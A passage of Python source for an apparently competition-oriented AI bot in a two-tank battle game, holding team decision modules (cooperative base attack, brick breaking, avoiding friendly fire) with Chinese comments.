_shouldStay = False # # 如果敌人威胁我的位置它曾经到过(这种情况实际上包含了第三点) # # 先找到威胁我方坦克的位置 _enemyRiskySite = None # (x, y) with map_.simulate_one_action(battler, realAction): for _action in oppBattler.get_all_valid_move_actions(): with map_.simulate_one_action(oppBattler, _action): if battler.on_the_same_line_with(oppBattler): _enemyRiskySite = oppBattler.xy break #assert _enemyRiskySite is not None # 一定会找到? enemyAttackingRoute = oppBattler.get_shortest_attacking_route() # # 不在敌人的进攻路线上,这样才算是已经走过,否则可以认为他在晃墙? # 5cec129e4742030582fac36d # if not _enemyRiskySite in enemyAttackingRoute: with map_.auto_undo_revert() as counter: while map_.revert(): # 回滚成功则 True counter.increase() if oppBattler.xy == _enemyRiskySite: # 他曾经到过这个地方 _shouldStay = False break if (_shouldStay and player.has_status(Status.ENEMY_MAY_APPEAR_BEHIND_BRICK) ): # 不能在这种情况下破墙! 5cec129e4742030582fac36d returnAction = Action.STAY continue if _shouldStay: # 先尝试 shoot 转 move #--------------- if Action.is_shoot(realAction): moveAction = realAction - 4 action = player.try_make_decision(moveAction) if Action.is_move(action): returnAction = action break if _shouldStay: # 否则 stay returnAction = Action.STAY continue # # (inserted) 打破老是回头的僵局 # # 尝试向着两边闪避 5ced9540641dd10fdcc79752 # if (oppBattler is not None # 好吧 ... 不加这个可能过不了自动测试 -> TODO: 也许我们不应该再替对方决策一遍? and player.has_label(Label.ALWAYS_BACK_AWAY) and not battler.is_in_our_site(include_midline=True) # 限制为严格地不在我方基地 ): for action in battler.try_dodge(oppBattler): _realAction = player.try_make_decision(action) if not Action.is_stay(_realAction): # 可走的路线,那么直接闪避 player.set_status(Status.TRY_TO_BREAK_ALWAYS_BACK_AWAY) player.remove_labels(Label.ALWAYS_BACK_AWAY) # 那么就打破了这个状态 realAction = _realAction # 并将闪避方向作为这回合的攻击方向 break # 否则继续攻击 player.set_status(Status.KEEP_ON_MARCHING) returnAction = realAction raise OUTER_BREAK # endfor # endwith player.set_current_attacking_route(route) # 缓存攻击路线 # # 现在判断是否是第一条路线,并考虑它的合理性! # # 乱回头实在是太蠢了! 5cee6727641dd10fdcc8dd96 -> 5cee6e3d641dd10fdcc8e8cf # if (not _isFirstRoute # 选的是非第一条路线 and _firstPreventBeingKilled # 不选一条的原因是为了防止被杀 and Action.is_move(realAction) # 这条路线给出的行为是移动 and Action.is_move(_firstAttackAction) # 第一个进攻路线也是移动 and Action.is_opposite(realAction, _firstAttackAction) # 于是这条路线给出的移动方向是远离进攻路线的方向! ): # 这种情况下应该停下来! returnAction = Action.STAY player.remove_status(Status.KEEP_ON_MARCHING) player.set_status(*_firstStatus) player.set_current_attacking_route(_firstRoute) # 找到一个侵略性的行为 if not Action.is_stay(returnAction): return returnAction # # 否则返回 STAY # 此处查找是否和第一条路线的决策结果一致,如果一致,那么就将第一次决策下的各种状态还原 # if (_firstRealAction is not None and Action.is_stay(_firstRealAction) ): if _firstStatus is not None: player.set_status(*_firstStatus) player.set_current_attacking_route(_firstRoute) return Action.STAY #{ END 'decision/single/marching.py' }# #{ BEGIN 'decision/team/individual.py' }# class IndividualTeamDecision(TeamDecisionMaker): """ 两人分别单独地进行决策,团队决策的起点 """ def _make_decision(self): team = self._team player1, player2 = team.players action1, _ = player1.make_decision() action2, _ = player2.make_decision() return [ action1, action2 ] #{ END 'decision/team/individual.py' }# #{ BEGIN 'decision/team/vital.py' }# class VitalTeamDecision(TeamDecisionMaker): """ 将关键的个人决策设置为团队决策,个人决策即为团队最优决策, 低优先级决策者不可对其进行协调 """ def _make_decision(self): team = self._team for player in team.players: if ( player.has_status(Status.SACRIFICE_FOR_OUR_BASE) # 准备为防御基地牺牲 or player.has_status(Status.BLOCK_ROAD_FOR_OUR_BASE) # 准备为防御基地堵路 or player.has_status(Status.READY_TO_ATTACK_BASE) # 准备攻击敌方基地 or player.has_status(Status.READY_TO_KILL_ENEMY) # 准备击杀敌人 ): # TODO: 牺牲攻击局,可能需要考虑一下闪避 5ccca535a51e681f0e8c7131 action = player.get_current_decision() player.set_team_decision(action) # 将个人决策设置为团队决策 return [ player.get_current_decision() for player in team.players ] #{ END 'decision/team/vital.py' }# #{ BEGIN 'decision/team/leave_teammate.py' }# class LeaveTeammateTeamDecision(TeamDecisionMaker): """ 和队友打破重叠的团队决策 己方两个坦克重叠在一起这种事情实在是太愚蠢了 ... """ def _make_decision(self): team = self._team player1, player2 = team.players returnActions = [ player.get_current_decision() for player in team.players ] if player1.defeated or player2.defeated: # 有队友已经挂了,那就不需要考虑这个情况了 return returnActions if player1.tank.xy == player2.tank.xy: if len([ action for action in returnActions if Action.is_move(action) ]) == 1: pass # 一人移动一人非移动,那么是合理的 elif ( all( Action.is_move(action) for action in returnActions ) and returnActions[0] != returnActions[1] ): # 两人均为移动,但是两人的移动方向不一样,这样也是可以的 pass elif all([ player.has_team_decision() for player in team.players ]): pass # 两者都拥有团队命令 else: # 两个队员可以认为是一样的,因此任意选择一个就好 if player1.has_team_decision(): player, idx = (player2, 1) else: player, idx = (player1, 0) with player.create_snapshot() as manager: action3, signal3 = player.make_decision(Signal.SHOULD_LEAVE_TEAMMATE) if signal3 == Signal.READY_TO_LEAVE_TEAMMATE: returnActions[idx] = action3 player.set_team_decision(action3) manager.discard_snapshot() # 保存更改 return returnActions #{ END 'decision/team/leave_teammate.py' }# #{ BEGIN 'decision/team/forced_attack.py' }# class ForcedAttackTeamDecision(TeamDecisionMaker): """ 强攻信号 ---------------- 为了解决单人决策行为过于保守的问题 在攻击过程中,一些所谓的有潜在危险的行为,实际上一点危险都没有,但是为了防止出错,就原地等待, 这反而是贻误了战机,甚至最后还要匆忙转攻为守,实际上根本就防不住 所以应该根据战场形势分析潜在风险究竟有多大,如果实际上是没有风险的,就发动强攻信号,让攻击者 保持进攻,而不去过分规避风险 如下情况是值得发动强攻信号的: 1. 侵略/僵持模式,出现了停止前进,防止被杀的状况 - 敌人正在和队友交火,敌人此回合可以射击,但是下回合必定会攻击队友 - 敌人正在和队友隔墙僵持,敌人可以射击,但是他并不攻击,多半是为了拖延战局 - 敌人正在和队友重叠,敌人可以射击,但是他一直在等待队友决策 2. 侵略/僵持模式,出现了停止前进,两方均越过了中线,对方明显不会回头,不想防你 """ def _make_decision(self): team = self._team Tank2Player = type(team.players[0]) returnActions = [ player.get_current_decision() for player in team.players ] for player in team.players: action = player.get_current_decision() if player.has_team_decision() or player.defeated: continue if ( player.has_status(Status.AGGRESSIVE) # 侵略模式 or player.has_status(Status.STALEMENT) # 僵持模式 ): if (action == Action.STAY # 但是出现了停止前进 and player.has_status(Status.WAIT_FOR_MARCHING) # 等待行军 and player.has_status(Status.PREVENT_BEING_KILLED) # 是为了防止被杀 ): _shouldForcedMarch = False playerRiskyEnemyBattler = player.get_risky_enemy() if playerRiskyEnemyBattler is None: # 说明是因为没有弹药? continue oppPlayer = Tank2Player(playerRiskyEnemyBattler) teammate = player.teammate # 考虑队友和敌军的情况 #debug_print(player.get_risky_enemy()) #debug_print(teammate.get_risky_enemy()) # 敌人正在和队友交火 #------------------ # 这种情况直接前进 # if (oppPlayer.has_status(Status.ENCOUNT_ENEMY) and oppPlayer.has_status(Status.READY_TO_FIGHT_BACK) and oppPlayer.get_risky_enemy() is teammate.battler ): # 说明对方正准备和队友交火 _shouldForcedMarch = True # 敌人正在和队友隔墙僵持 #---------------------- # 如果他们僵持了超过一回合以上 # 保守起见,等待一回合,如果对方并未攻击我,说明它更关心和队友僵持,或者故意在拖时间 # # 那么可以直接进攻 # elif (oppPlayer.has_status(Status.HAS_ENEMY_BEHIND_BRICK) # 僵持超过一回合 and oppPlayer.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1) and oppPlayer.get_risky_enemy() is teammate.battler and player.has_status_in_previous_turns(Status.WAIT_FOR_MARCHING, turns=1) # 已经等待了一回合 and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1) ): _shouldForcedMarch = True # 敌人正在和队友重叠 #---------------------------- # 如果他们重叠不动超过一回合以上 # 保守起见,等待一回合,如果对方并未攻击我,说明它更关心和队友重叠 # # 那么可以直接进 # elif (oppPlayer.has_status(Status.OVERLAP_WITH_ENEMY) # 僵持超过一回合 and oppPlayer.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and player.has_status_in_previous_turns(Status.WAIT_FOR_MARCHING, turns=1) # 已经等待了一回合 and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1) ): _shouldForcedMarch = True # 双方均跨过中线 #----------------------------- # 那么不再反击,直接进攻? # # TODO: # 存在着一攻一守的 bot # if _shouldForcedMarch: # 建议强制行军 with player.create_snapshot() as manager: action3, signal3 = player.make_decision(Signal.FORCED_MARCH) if Signal.is_break(signal3): continue if signal3 == Signal.READY_TO_FORCED_MARCH: returnActions[player.id] = action3 player.set_team_decision(action3) player.set_status(Status.FORCED_MARCHING) manager.discard_snapshot() return returnActions #{ END 'decision/team/forced_attack.py' }# #{ BEGIN 'decision/team/break_brick.py' }# class BreakBrickTeamDecision(TeamDecisionMaker): """ 主动破墙的团队决策 ----------------- 乱破墙是不可以的,单人不要随便破墙,但是有条件的破墙是可以的 """ def _make_decision(self): team = self._team Tank2Player = type(team.players[0]) returnActions = [ player.get_current_decision() for player in team.players ] for player in team.players: action = player.get_current_decision() if player.has_team_decision() or player.defeated: continue if (Action.is_stay(action) # 当前回合处于等待状态 and player.has_status(Status.HAS_ENEMY_BEHIND_BRICK) # 墙后有人造成的 and player.has_status(Status.WAIT_FOR_MARCHING) # 因此等待行军 #and not player.has_status(Status.DEFENSIVE) # 不要让防御性的队友随意破墙 and not player.has_status(Status.RELOADING) # 目前有弹药 # and self.has_status_in_previous_turns(player, Status.WAIT_FOR_MARCHING, turns=1) # 改成一有机会就先留后路 ): # 触发的条件是一方隔墙,队友因为这两个人的僵持受到牵制 #---------------------------------------------------- # 僵持方先破墙,留好后路 #---------------------- with player.create_snapshot() as manager: action3, signal3 = player.make_decision(Signal.PREPARE_FOR_BREAK_BRICK) if Signal.is_break(signal3): continue if signal3 == Signal.READY_TO_PREPARE_FOR_BREAK_BRICK: # 下一步准备凿墙 returnActions[player.id] = action3 player.set_team_decision(action3) manager.discard_snapshot() continue # 至此该队员决策完成,等待它这回合凿墙 # elif signal3 == Signal.READY_TO_BREAK_BRICK: # 否则将受到破墙信号,开始判断是否符合破墙条件 elif signal3 == Signal.READY_TO_BREAK_BRICK: oppBattler = player.get_risky_enemy() # 获得墙后敌人 assert oppBattler is not None # 必定有风险敌人 oppPlayer = Tank2Player(oppBattler) # playerIdx = idx # teammateIdx = 1 - idx teammate = player.teammate _shouldBreakBrick = False if oppBattler.has_enemy_around(): # 发现敌人和队友相遇,立即破墙 _shouldBreakBrick = True ''' 这个两个触发已经不再需要了 5ce217e8d2337e01c7a3790c # TODO: # 这种情况挺难遇到的,而且一旦遇到一般都为时过晚 # 应该要模拟地图预测一下,提前开一炮 # if (teammate.has_status(Status.WAIT_FOR_MARCHING) # 队友等待 # and self.has_status_in_previous_turns(teammate, Status.WAIT_FOR_MARCHING, turns=1) and teammate.has_status(Status.PREVENT_BEING_KILLED) # 队友是为了防止被杀 ): teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() # 墙后敌人 if teammateRiskyEnemyBattler is playerRiskyEnemyBattler: # 两者受到同一个敌人牵制,那么发动破墙信号 _shouldBreakBrick = True elif ( teammate.has_status(Status.AGGRESSIVE) or teammate.has_status(Status.STALEMENT) ): teammateAction = returnActions[ teammateIdx ] if (Action.is_move(teammateAction) # 确保队友动作为移动 and teammate.has_status(Status.KEEP_ON_MARCHING) # 队友正在行军 ): # 尝试模拟下一回合的队友状态,并让队友重新决策,查看他的状态 with map_.simulate_one_action(teammate, teammateAction): action4, _ = teammate.make_decision() if (teammate.has_status(Status.WAIT_FOR_MARCHING) and teammate.has_status(Status.PREVENT_BEING_KILLED) ): # 这个时候队友被阻拦 teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() if teammateRiskyEnemyBattler is playerRiskyEnemyBattler: _shouldBreakBrick = True # 如果是因为对面墙的坦克在阻拦,那么马上破墙''' # # 如果遇到对手准备和队友对射 5cd364e4a51e681f0e921e7a # 那么考虑直接破墙 # # 敌方当前回合应该必定会还击,否则就失去了防御的意义 # 于是,随后就会遇到二对一且三方均没有炮弹 # 如果对方下回合不走,那么二打一直接干掉 # 如果对方下回合移动,那么攻击的队友就解除了威胁,可以继续前进 # if (not teammate.has_status(Status.DEFENSIVE) and teammate.has_status(Status.ENCOUNT_ENEMY) and teammate.has_status(Status.READY_TO_FIGHT_BACK) ): teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() if teammateRiskyEnemyBattler is playerRiskyEnemyBattler: _shouldBreakBrick = True if _shouldBreakBrick: returnActions[player.id] = action3 player.set_team_decision(action3) manager.discard_snapshot() continue return returnActions #{ END 'decision/team/break_brick.py' }# #{ BEGIN 'decision/team/back_to_help.py' }# class BackToHelpTeamDecision(TeamDecisionMaker): """ 考虑一种墙后后退的逻辑 5cea650cd2337e01c7ad8de4 这样可以制造二打一的局面 TODO: 回退后可能会造成 WITHDRAW 的情况出现 ? """ def _make_decision(self): team = self._team map_ = team._map Tank2Player = type(team.players[0]) returnActions = [ player.get_current_decision() for player in team.players ] for player in team.players: action = player.get_current_decision() if player.has_team_decision() or player.defeated: continue teammate = player.teammate teammateBattler = teammate.battler if (player.has_status(Status.HAS_ENEMY_BEHIND_BRICK) and teammate.has_status(Status.WITHDRAW) and teammate.has_status(Status.ENCOUNT_ENEMY) and (teammate.has_status(Status.READY_TO_FIGHT_BACK) or teammate.has_status_in_previous_turns(Status.READY_TO_FIGHT_BACK, turns=1) ) # 保持对射行为, # TODO: # 或许可以考虑用 对射状态描述撤退状态下的对射? ): battler = player.battler oppBattler = player.get_risky_enemy() if oppBattler is None: # 5cee87fc641dd10fdcc91b44 为何空指针 ??? continue oppPlayer = Tank2Player(oppBattler) teammateRiskyEnemyTank = oppPlayer.teammate.tank # 当前和我墙后僵持的敌人的队友 if oppBattler is not None and teammateRiskyEnemyTank is not None: # 应该不会这样? backAwayAction = battler.back_away_from(oppBattler) _shouldBackAway = False with map_.auto_revert() as counter: while map_.is_valid_move_action(battler, backAwayAction): map_.single_simulate(battler, backAwayAction) counter.increase() if teammateRiskyEnemyTank in battler.get_enemies_around(): _shouldBackAway = True break if _shouldBackAway: with player.create_snapshot() as manager: action3, signal3 = player.make_decision(Signal.SUGGEST_TO_BACK_AWAY_FROM_BRICK) if Signal.is_break(signal3): continue if signal3 == Signal.READY_TO_BACK_AWAY_FROM_BRICK: returnActions[player.id] = action3 player.set_team_decision(action3) continue return returnActions #{ END 'decision/team/back_to_help.py' }# #{ BEGIN 'decision/team/prevent_team_hurt.py' }# class PreventTeamHurtTeamDecision(TeamDecisionMaker): """ 防止队员自残 -------------- 在决策链的最后,判断是否出现队友恰好打掉准备移动的队友的情况,并加以协调 """ def _make_decision(self): team = self._team map_ = team._map oppBase = map_.bases[1 - team.side] player1, player2 = team.players returnActions = [ player.get_current_decision() for player in team.players ] if player1.defeated or player2.defeated: # 有队友已经挂了,没必要考虑这个情况 return returnActions action1, action2 = returnActions _mayShouldForcedStop = False if Action.is_shoot(action1) and Action.is_move(action2): shootAction = action1 shootPlayer = player1 moveAction = action2 movePlayer = player2 _mayShouldForcedStop = True elif Action.is_move(action1) and Action.is_shoot(action2): shootAction = action2 shootPlayer = player2 moveAction = action1 movePlayer = player1 _mayShouldForcedStop = True if _mayShouldForcedStop: moveBattler = movePlayer.battler shootBattler = shootPlayer.battler _shouldForcedStop = False with map_.simulate_one_action(moveBattler, moveAction): with map_.simulate_one_action(shootBattler, shootAction): if moveBattler.destroyed: # 刚好把队友打死 ... _shouldForcedStop = True if _shouldForcedStop: # # TODO: # 如何决策? # 改动射击和决策都有可能很危险 # # # 这里先做一个特殊情况,那就是重叠攻击基地,这种情况将移动的队友视为不移动 # # TODO: # 好吧,这种情况和主动和队友打破重叠的行为是相斥的 ... # '''if (moveBattler.xy == shootBattler.xy and moveBattler.is_face_to_enemy_base(ignore_brick=False) and shootBattler.is_face_to_enemy_base(ignore_brick=False) ): returnActions[movePlayer.id] = Action.STAY hasTeamActions[movePlayer.id] = True''' # # 先判断这种情况 5ce92f70d2337e01c7abf587 #----------------- # # 默认让射击队友停下 #-------------------- stayID = shootBattler.id stopPlayer = shootPlayer # # 以下情况,应该让 moveBattler 停下来 # # 1. 射击队友正在和敌人对射 # 2. 射击队员正面向敌人基地(为了触发团队协作) # # 其他更有待补充 ... # if (shootPlayer.has_status(Status.READY_TO_FIGHT_BACK) or shootPlayer.battler.on_the_same_line_with(oppBase, ignore_brick=True) ): stayID = moveBattler.id stopPlayer = movePlayer stopPlayer.set_status(Status.FORCED_STOP_TO_PREVENT_TEAM_HURT) returnActions[stayID] = Action.STAY stopPlayer.set_current_decision(Action.STAY) stopPlayer.set_team_decision(Action.STAY) return returnActions #{ END 'decision/team/prevent_team_hurt.py' }# #{ BEGIN 'decision/team/cut_through_midline.py' }# class CutThroughMidlineTeamDecision(TeamDecisionMaker): """ 当我方队员与敌人在墙后僵持,并且不得不选择等待的时候 考虑是否可以打通土墙,因为这个时候也许可以干扰另一路敌人的进攻路线 """ def _make_decision(self): team = self._team map_ = team._map base = map_.bases[team.side] Tank2Player = type(team.players[0]) returnActions = [ player.get_current_decision() for player in team.players ] for player in team.players: # # 保守起见,先等待一回合 # # TODO: # 有可能延误战机! 5ced7ce1641dd10fdcc776b1 # 这样才是对的 5ced7d66641dd10fdcc777ae # # if not player.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1): # continue with outer_label() as OUTER_CONTINUE: action = player.get_current_decision() tank = player.tank battler = player.battler if player.has_team_decision() or player.defeated: continue if (Action.is_stay(action) # 当前回合处于等待状态 and player.has_status(Status.HAS_ENEMY_BEHIND_BRICK) # 墙后有人造成的 and player.has_status(Status.WAIT_FOR_MARCHING) # 因此等待行军 and battler.canShoot # 必须要能够射击 and battler.is_near_midline() # 只有中线附近的队友才会触发这个攻击条件 ): _oppBattler = player.get_risky_enemy() _oppPlayer = Tank2Player(_oppBattler) # 实际考虑的是它的队员! oppPlayer = _oppPlayer.teammate oppBattler = oppPlayer.battler oppTank = oppBattler.tank if oppPlayer.defeated: # 对方已经输了,就不用管了 ... continue x1, y1 = battler.xy dx = np.sign( base.x - x1 ) x2 = x1 + dx y2 = y1 shootAction = Action.get_shoot_action(x1, y1, x2, y2) if battler.will_destroy_a_brick_if_shoot(shootAction): # 将会打掉一个砖块 field = battler.get_destroyed_fields_if_shoot(shootAction)[0] # # 首先判断这一步射击是否会阻止敌人的移动 # enemyAttackingRoute = oppBattler.get_shortest_attacking_route() oppAction = oppBattler.get_next_attacking_action(enemyAttackingRoute) oppRealAction = oppPlayer.try_make_decision(oppAction) if (Action.is_move(oppAction) and Action.is_stay(oppRealAction) and oppPlayer.get_risky_enemy() is battler ): # 敌人下回合打算行军,但是受到我方坦克的影响而停止 continue # 那就算了 # # 判断是否摧毁了敌人进攻路线上的块 # _dx = np.sign( base.x - field.x ) # 首先判断这个块是否和当前坦克处在不同测的地图上 if _dx != 0 and _dx != dx: # _dx == 0 表示 x = 4 中线的墙可以打掉 if field.xy in enemyAttackingRoute: continue # 不要打掉这个块? # # 防止出现我方坦克打掉一个块,对方可以突然出现在 field 前 # for enemyMoveAction in oppBattler.get_all_valid_move_actions(): with map_.simulate_multi_actions((battler, shootAction), (oppBattler, enemyMoveAction)): if oppBattler.destroyed: # 好吧,还是要判断一下这种情况的 ... continue for enemy in oppBattler.get_enemies_around(): if enemy is tank: raise OUTER_CONTINUE # # 现在说明可以射击 # player.set_status(Status.READY_TO_CUT_THROUGH_MIDLINE) returnActions[player.id] = shootAction player.set_team_decision(shootAction) return returnActions #{ END 'decision/team/cut_through_midline.py' }# #{ BEGIN 'decision/team/cooperative_attack.py' }# class CooperativeAttackTeamDecision(TeamDecisionMaker): """ 团队合作拆家策略 ----------------- 案例 ------------ 1. 5ceacbd0811959055e22139d 需要预判 1 步 -> 5cec07f30df42d28e72de8d8 2. 5ce8db66d2337e01c7ab9fae 需要预判 3 步 -> 5cec1a324742030582fad728 3. 5cec9157641dd10fdcc5f30d 重叠进攻时能够分开射击了 4. 5cec9a19641dd10fdcc5ff9f case 3 的另一种实现,提前找到合作路线 5. 5cec9c10641dd10fdcc60254 case 2 的另一种实现 6. 5cec9d01641dd10fdcc6045a 合作与不合作路线相同,但是选择了合作 7. 5cec9d7f641dd10fdcc60556 8. 5ceca04d641dd10fdcc60aed case 2 的另一种实现,但是路线更短,因为将合作触发条件放宽到非严格过中线! 9. 5ceca0ab641dd10fdcc60bb6 将合作条件放宽到非严格过中线可以触发的合作拆家 10. 5ceca21b641dd10fdcc60d4d 11. 5ceca3c3641dd10fdcc61071 12. 5ceca80d641dd10fdcc617e9 13. 5cecabbd641dd10fdcc61d34 14. 5cecfa94641dd10fdcc69661 触发前提 -------------- 在双方均到达对方基地的前提下,假定双方坦克不会再发生交火。在这种情况下,可以认为找到的 最短路线即为实际可走的、不受敌方影响的最短路线。那么可以进行团队合作,寻找一条两人合作下 距离更加短的进攻路线 实现方法 -------------- 下面给出一种简单的实现方法(只预判一回合,更加复杂的情况尚未能实现) 这个策略中存在主攻队员和辅助队员的角色划分。这个并不能在一开始就得出定论,而是要通过判断。 首先,合作拆家所希望达到的效果是,辅助队员帮助主攻队员清除其路线上的土墙,从而减短主攻队员的 攻击路线长度。每清除掉一个土墙,能够减少的路径长度为 2 因此,首先在 delay = 1 的限制条件下,找到其中一个进攻队员所有可能的最短路线。 delay = 1 是允许的, 因为一个土墙的权重是 2 ,打掉 delay = 1 的路线上的一个土墙,可以得到比 delay = 0 的最短路线更加短的路线。 然后考虑另一个进攻队员当前回合所有可能的攻击行为。找到这些攻击行为下能够摧毁掉的 fields ,如果恰好是 位于另一队员攻击路线上的土墙,那么就找到了一条双人合作下的更短路线。 依照上述方法,可以列举出所有可能的最短路线。对这些路线长度进行排序以找到最短的路线,即为团队合作下更优 的一种拆家路线。 补充的更复杂实现 ----------------- 有的时候会出现两个队友攻击路线相同且刚好互相不会影响 5ce8db66d2337e01c7ab9fae ,这种情况下实际上仍然 有机会产生团队合作,但是需要预判 3 步,第一步首先考虑所有可能的进攻行为,第二步按照正常的进攻方向,第三步 再尝试寻找团队更优路线,如果此时可以找到团队合作路线,那么当前回合就先采用第一步的进攻行为。第二步照常进攻 到了第三步的时候就会被上面那种单回合的合作拆家决策找到合作路线。 特判情况 ----------- 1. 考虑这样一种情况,当前两个队友进攻路线长度相同,两者下一步同时攻击一个块,假如让其中一个坦克停止攻击 在下回合可以得到更加短的进攻路线,那么就让这个队员暂时停下来。这种情况通常对应着最后拆基地的几步,一个队员 暂时停下来,让另一个队员拆到前面的墙,然后他下回合马上可以打掉基地,最短路线长度是 2 , 如果双方此时是同时开火的,那么最短路线长度是 3 2. 假设一个队友这回合打掉墙,另一个队友下回合可以到达这个队友身后,下回合前面的队友闪避,后面的队友射击, 那么最短路线长度是 2 ,如果此时前一个队员等待一回合,后面的队员将无法射击,那么最短路线长度将是 3 """ IS_MIDDLE_FIRST = True # 优先中路搜索 IS_X_AXIS_FIRST = True # 优先 x-轴优先搜索 def _find_cooperative_solution(self, attackingPlayer, assistantPlayer): """ 给定 attackingPlayer 和 assistantPlayer ,尝试寻找一种最短的进攻路线 如果有个可行的方案,那么只返回找到的第一个 Return: - solution (attackingPlayer, route, realAction, assistantPlayer, shootAction) / None """ team = self._team map_ = team._map oppBase = map_.bases[1 - team.side] IS_MIDDLE_FIRST = self.__class__.IS_MIDDLE_FIRST IS_X_AXIS_FIRST = self.__class__.IS_X_AXIS_FIRST attackingBattler = attackingPlayer.battler assistantBattler = assistantPlayer.battler for route in attackingBattler.get_all_shortest_attacking_routes(delay=1, middle_first=IS_MIDDLE_FIRST, x_axis_first=IS_X_AXIS_FIRST): for shootAction in assistantBattler.get_all_valid_shoot_actions(): destroyedFields = assistantBattler.get_destroyed_fields_if_shoot(shootAction) if len(destroyedFields) == 1: field = destroyedFields[0] if isinstance(field, BrickField) and field.xy in route: # 拆到了一个队友进攻路线上的土墙 # # 首先考虑打掉的是不是同一个块 # # 打掉同一个块的情况下,当且仅当攻击方已经面向对方基地时有效,否则起不到增加长度的效果 # attackAction = attackingBattler.get_next_attacking_action(route) if Action.is_shoot(attackAction): destroyedFields2 = attackingBattler.get_destroyed_fields_if_shoot(attackAction) if len(destroyedFields2) == 1 and destroyedFields2[0] is field: # 打掉的是同一个块 if not attackingBattler.on_the_same_line_with(oppBase, ignore_brick=True): continue # 只有当攻击方面对对方基地时,才能起到减少路线长度的效果 else: # 否则可以让攻击方这回合等待 realAction = Action.STAY return (attackingPlayer, route, realAction, assistantPlayer, shootAction) realAction = attackingPlayer.try_make_decision(attackAction) if not Action.is_stay(realAction): return (attackingPlayer, route, realAction, assistantPlayer, shootAction) # 找不到,返回 None return None def _make_decision(self): team = self._team map_ = team._map oppBase = map_.bases[1 - team.side] player1, player2 = team.players returnActions = [ player.get_current_decision() for player in team.players ] if player1.defeated or player2.defeated: # 不是两个人就不需要考虑合作了 return returnActions elif ( not player1.battler.is_in_enemy_site(include_midline=True) or not player2.battler.is_in_enemy_site(include_midline=True) ): # 两者必须同时在对方基地,并且是严格的不包含中线 # # 条件放宽了,现在允许包含中线 5cec9e9d641dd10fdcc60783 # return returnActions elif ( player1.has_status(Status.ENCOUNT_ENEMY) or player2.has_status(Status.ENCOUNT_ENEMY) or player1.has_status(Status.WAIT_FOR_MARCHING) or player2.has_status(Status.WAIT_FOR_MARCHING) or player1.has_status(Status.PREVENT_BEING_KILLED) or player2.has_status(Status.PREVENT_BEING_KILLED) ): # 不可以拥有和敌人遭遇战斗相关的状态 return returnActions IS_MIDDLE_FIRST = self.__class__.IS_MIDDLE_FIRST IS_X_AXIS_FIRST = self.__class__.IS_X_AXIS_FIRST # # 不需要判断是否具有团队信号? # # 事实上他碰巧提供了一个很好的案例 5cec9157641dd10fdcc5f30d # 最后一步的时候由于覆盖了 READY_TO_LEAVE_TEAMMATE 的团队策略,使得最后一步合作得以顺利实现! # solutions = [] # -> [ (attackingPlayer, route, realAction, assistantPlayer, shootAction) ] for attackingPlayer, assistantPlayer in [ (player1, player2), (player2, player1) ]: attackingBattler = attackingPlayer.battler assistantBattler = assistantPlayer.battler if not assistantBattler.canShoot: # 当前回合不能进攻,那就无法发起协助了 ... continue _route1 = attackingBattler.get_shortest_attacking_route() _route2 = assistantBattler.get_shortest_attacking_route() minRouteLength = min(_route1.length, _route2.length) # # 攻击方进攻路线长度比辅助方长 2 步以上,那么直接跳过 #-------------------------------------------------------- # 因为单回合决策下至多可以让一个队员的路线长度减 2,如果进攻方比辅助方的攻击路线长 2 步以上,那么 # 一回合内无论如何都不可能让进攻方的路线长度短于辅助方当前回合的最短路线长度,在这种情况下即使可以 # 发生合作,也是没有意义的,甚至可能拖延辅助方的进攻节奏(但是并不能排除可以多回合帮助,然而这个情况 # 非常复杂,所以在此不考虑了) # if _route1.length - _route2.length >= 2: continue solution = self._find_cooperative_solution(attackingPlayer, assistantPlayer) if solution is not None: solutions.append(solution) with map_.auto_revert() as counter: # # 现在往后模拟两回合 5ce8db66d2337e01c7ab9fae # # 第一步随便攻击,第二步按照正常的攻击方向,第三步看是否有合适的攻击路线 # _cachedActions = set() # 缓存已经尝试过的第一步两个方向 for route1 in attackingBattler.get_all_shortest_attacking_routes(delay=1, middle_first=IS_MIDDLE_FIRST, x_axis_first=IS_X_AXIS_FIRST): # 攻击方第一步允许 delay = 1 action1 = attackingBattler.get_next_attacking_action(route1) realAction1 = attackingPlayer.try_make_decision(action1) if Action.is_stay(realAction1): continue for route2 in assistantBattler.get_all_shortest_attacking_routes(middle_first=IS_MIDDLE_FIRST, x_axis_first=IS_X_AXIS_FIRST): action2 = assistantBattler.get_next_attacking_action(route2) realAction2 = assistantPlayer.try_make_decision(action2) if Action.is_stay(realAction2): continue key = (action1, action2) if key in _cachedActions: continue _cachedActions.add(key) with map_.auto_revert() as counter: ## 模拟两步 ## map_.multi_simulate((attackingBattler, action1), (assistantBattler, action2)) counter.increase() # 模拟两步找到路线 solution = self._find_cooperative_solution(attackingPlayer, assistantPlayer) if solution is not None: solutions.append( (attackingPlayer, route1, action1, assistantPlayer, action2) ) continue ## 模拟三步 ## action11 = attackingBattler.get_next_attacking_action() action22 = assistantBattler.get_next_attacking_action() map_.multi_simulate((attackingBattler, action11), (assistantBattler, action22)) counter.increase() # 模拟三步找到路线 solution = self._find_cooperative_solution(attackingPlayer, assistantPlayer) if solution is not None: solutions.append( (attackingPlayer, route1, action1, assistantPlayer, action2) ) continue if len(solutions) > 0: solutions.sort(key=lambda tup: tup[1].length) for attackingPlayer, route, realAction, assistantPlayer, shootAction in solutions: attackingBattler = attackingPlayer.battler assistantBattler = assistantPlayer.battler returnActions[attackingBattler.id] = realAction returnActions[assistantBattler.id] = shootAction attackingPlayer.set_current_attacking_route(route) attackingPlayer.set_current_decision(realAction) attackingPlayer.set_team_decision(realAction) assistantPlayer.set_current_decision(shootAction) assistantPlayer.set_team_decision(shootAction) assistantPlayer.set_status(Status.HELP_TEAMMATE_ATTACK) break return returnActions #{ END 'decision/team/cooperative_attack.py' }# #{ BEGIN 'decision/team/dummy_ending.py' }# class TeamDecisionDummyEnding(TeamDecisionMaker): """ 用于结束 DecisionChain 的结尾 """ def is_handled(self, result): """ 返回 True ,这样 DecisionChain 就会结束 